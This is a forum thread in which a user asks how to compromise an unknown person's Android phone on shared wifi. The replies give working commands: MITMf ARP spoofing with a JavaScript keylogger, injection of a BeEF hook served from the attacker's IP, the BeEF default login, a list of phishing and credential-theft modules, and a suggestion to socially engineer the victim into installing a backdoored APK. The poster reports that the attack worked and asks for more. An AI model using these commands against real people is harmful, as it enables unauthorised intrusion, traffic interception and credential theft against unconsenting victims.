Forum Thread: Hack a Android Phone Connected Same Wifi Router

Hello

i connected to a wifi router and there was some body else. i just have ip of android phone. i don't know who is he/she or where is it.

is there any way i push my payload and run in android phone by know ing ip address?

9 Responses

run browser_autopwn2 and use MITMF to redirect traffic to your IP
Edit: don't forget to set URIPATH to / so that you can redirect properly to your IP.
Another efficient method is BEEF...but again you need to redirect traffic to your IP with MITMF.
example: http://192.168.1.10:3000/hook.js

These are the BEST BEEF attacks that were successful for me:
clippy
fake flash update
fake notification bar
google phishing
Pretty theft (facebook)

is there any tutorial for this?

ask uncle google :) i guess you're familiar with msfconsole, or you shouldn't be here at all !

  • for beef, run this command in terminal: beef-xss

login through the web gui. (your ip address:3000/ui/authentication)
username:beef
password:beef

  • for MITMF:

if you're using browser_autopwn2, use this command:

mitmf -i wlan0 --targets VICTIM-IP-HERE --gateway 192.168.1.1 --arp --spoof --inject --html-url http://YOUR-IP-HERE:80/index.html

if you're using BEEF hook, run this command:

mitmf -i wlan0 --targets VICTIM-IP-HERE --gateway 192.168.1.1 --arp --spoof --jskeylogger --inject --js-url http://YOUR-IP-HERE:3000/hook.js

on BEEF, the hooked browser of the victim will appear on the left side of BEEF. click on it and try the attacks

sorry. i know, i just want to learn as soon as possible. its better i'm going research about it. now i know what to do. thank you.

i try beEF & MITMF. but i have problem with MITMF. when i run your command mitmf at first every thing is ok but then got this log "exception occurred while poisoning" and hooked browser going offline.

can you help me?

thank you. its worked. it seems this guy don't use any browser. is there any other ways to hack this guy?

if he's connected to the router, he'll sooner or later open a browser. a little patience and you'll get what you want.

if he doesn't open a website, i'm afraid there's nothing else you can do if you don't know him in person. IF you know who he is, then you can try social engineering and convince him to install a backdoored apk... search for tutorials and use your wit to figure out how to hack him. As I said before, to be a hacker you should be patient and willing to learn at a slow pace... never rush

one more thing, i'm using virtualbox and it detect and fully work with tp link tl-wn722n. but after some time it stop working. the adapter's light is on, and show in ifconfig. what's the problem?

Share Your Thoughts

  • Hot
  • Active